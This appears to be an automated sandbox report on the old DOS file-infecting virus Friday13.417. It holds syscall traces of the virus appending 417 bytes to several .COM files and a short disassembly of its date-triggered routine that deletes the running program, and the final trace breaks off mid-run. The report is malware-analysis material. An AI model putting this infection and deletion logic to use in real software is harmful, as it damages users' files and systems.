Sample viewer

vx.netlux.org/Virus.DOS.Friday13.417

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:34.116074237Z 26 PC: 12adf | Set disk transfer address
2018-12-17T22:53:34.119211293Z 78 PC: 12ae8 | Find first file
2018-12-17T22:53:34.127699705Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:53:34.134101022Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.140367437Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.142214823Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.143625723Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.14613877Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.148563551Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.312852954Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.329287979Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.334017087Z 61 PC: 12b21 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:53:34.340568043Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.346724253Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.349026Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.350543818Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.353274465Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.362360256Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.364898194Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.372411185Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.375234941Z 61 PC: 12b21 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:53:34.382185785Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.388617899Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.389977798Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.392396161Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.396677343Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.398726569Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.408038766Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.416673655Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.429031642Z 61 PC: 12b21 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:53:34.436899742Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.443194135Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.444490274Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.446752619Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.449584759Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.451164466Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.45491847Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.462469567Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.465468795Z 61 PC: 12b21 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:53:34.472516513Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.477208855Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.478415379Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.480524058Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.483433601Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.484675931Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.488222347Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.49546096Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.497946203Z 61 PC: 12b21 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:53:34.504502172Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.510863655Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.512146538Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.514192357Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.516962884Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.518284455Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.522409317Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.530576528Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.533180765Z 61 PC: 12b21 | Open file (Filename = 'PAH.COM')
2018-12-17T22:53:34.54044688Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.547160259Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.54886836Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.550619258Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.553557767Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.555582461Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.569317828Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.577130404Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.579734147Z 61 PC: 12b21 | Open file (Filename = 'TEST.COM')
2018-12-17T22:53:34.586587897Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:34.589550298Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:53:34.591115521Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:53:34.592732379Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:34.595574441Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:53:34.596927114Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:53:34.605468344Z 62 PC: 12ba8 | Close file
2018-12-17T22:53:34.614328236Z 79 PC: 12af1 | Find next file
2018-12-17T22:53:34.616659304Z 26 PC: 12aff | Set disk transfer address
2018-12-17T22:53:34.618084817Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-17T22:53:34.620446965Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.489470047Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.491578329Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.497751918Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.504222214Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.510407863Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.512229091Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.513872038Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.516752255Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.525016778Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.539998128Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.548799111Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.552133181Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.559368013Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.565564938Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.576554584Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.577957213Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.580602639Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.582806898Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.585461408Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.595181231Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.600015745Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.606512428Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.61444739Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.616705719Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.618292198Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.62104839Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.623320031Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.631413952Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.646340462Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.649938721Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.656851012Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.663002586Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.665536996Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.66691295Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.672633523Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.674698149Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.678079499Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.685408188Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.689667467Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.69607402Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.702452618Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.70394404Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.705477199Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.708112805Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.709754259Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.712715622Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.720123142Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.722827094Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.729700249Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.735764209Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.737499617Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.739202108Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.741790103Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.743201919Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.748563852Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.756519705Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.759285701Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.76672718Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.773033505Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.775155248Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.777235196Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.780109946Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.78162921Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.785188204Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.793012864Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.795828671Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.803168187Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.806348056Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.808018965Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.810364021Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.813524524Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.815171435Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.824314521Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.837629684Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.840311985Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:16.841714827Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:16.845179011Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.502679437Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.504907967Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.511796246Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.519123909Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.526672777Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.529127456Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.530692464Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.534555636Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.536488642Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.552354304Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.56144317Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.56492609Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.572579336Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.579639127Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.581626765Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.583333576Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.586467925Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.589120677Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.592304802Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.601188131Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.605551302Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.615303784Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.622636677Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.627907613Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.629506143Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.632435837Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.634145917Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.646677322Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.659574901Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.662496931Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.670847418Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.678555458Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.680193621Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.682316627Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.685336526Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.686834643Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.690188899Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.698847897Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.701779059Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.709610636Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.716610476Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.718906158Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.721061806Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.723907273Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.725438505Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.729499733Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.738370814Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.742524692Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.750289118Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.757940465Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.759753827Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.761402051Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.765094762Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.766607349Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.771032042Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.780876829Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.783635744Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.788919675Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.795239976Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.796498434Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.797922637Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.8005234Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.801777186Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.803777237Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.811173377Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.821462693Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.826985901Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.829876486Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.831582579Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.833721071Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.835752637Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.837560167Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.844373358Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.855415644Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.858001907Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:16.859137622Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:16.860894599Z 65 PC: 12bd7 | Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:30:16.87142867Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":6,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.625419308Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.629963384Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.635892977Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.643359916Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.651260753Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.652749744Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.654157313Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.657801302Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.659387593Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.673155088Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.681195444Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.684638181Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.691212551Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.697771469Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.702671465Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.704398211Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.70693928Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.708924241Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.711679605Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.717098444Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.720255213Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.725239959Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.729489424Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.730964112Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.732450617Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.735018197Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.73689327Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.750162329Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.755539204Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.758435246Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.762724593Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.767318214Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.768849785Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.774314848Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.776608379Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.778163733Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.78114356Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.789115374Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.792772707Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.800570812Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.807103676Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.808491891Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.810900764Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.813669581Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.815393799Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.818887974Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.826925291Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.829748583Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.835082065Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.841596833Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.844298332Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.846051979Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.847956558Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.84959725Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.852689831Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.85878869Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.861770791Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.867206556Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.871552392Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.872986507Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.875086023Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.878046543Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.879822651Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.884637186Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.892035861Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.894607096Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.90227776Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.90408469Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.905154074Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.906875334Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.908643909Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.909764603Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:30:16.915836199Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:30:16.921400461Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:30:16.936563245Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:30:16.938779003Z 42 PC: 12bb0 | Get date
0x12bb0: cmp dl, 6
0x12bb3: jne 0x12bd8
0x12bb5: cmp dh, 1
0x12bb8: jne 0x12bd8
0x12bba: xor ax, ax
0x12bbc: mov cx, 0x7fff
0x12bbf: xor di, di
0x12bc1: mov es, word ptr es:[0x2c]
0x12bc6: cld
0x12bc7: repne scasd eax, dword ptr es:[di]
0x12bc9: jne 0x12bd8
0x12bcb: add di, 2
0x12bce: push ds
0x12bcf: push es
0x12bd0: pop ds
0x12bd1: mov ah, 0x41
0x12bd3: mov dx, di
0x12bd5: int 0x21
0x12bd7: pop ds
0x12bd8: pop es
2018-12-25T12:30:16.941802656Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11264,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:16.726671068Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:30:16.72854113Z 78 PC: 12ae8 | Find first file
2018-12-25T12:30:16.73441871Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:16.740713219Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:16.747422436Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:30:16.748890532Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:30:16.750477422Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:16.754283413Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:30:16.756058016Z 64 PC: 12b97 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:30:16.769645597Z 62 PC: 12ba8 | Close file
2018-12-25T12:30:16.777807256Z 79 PC: 12af1 | Find next file
2018-12-25T12:30:16.78105916Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:30:16.787288231Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:30:16.79360608Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:30:16.795621444Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:30:16.796919135Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:30:16.798880187Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:30:16.801601994Z 64 PC: 12b97 | Write file or device (See above)
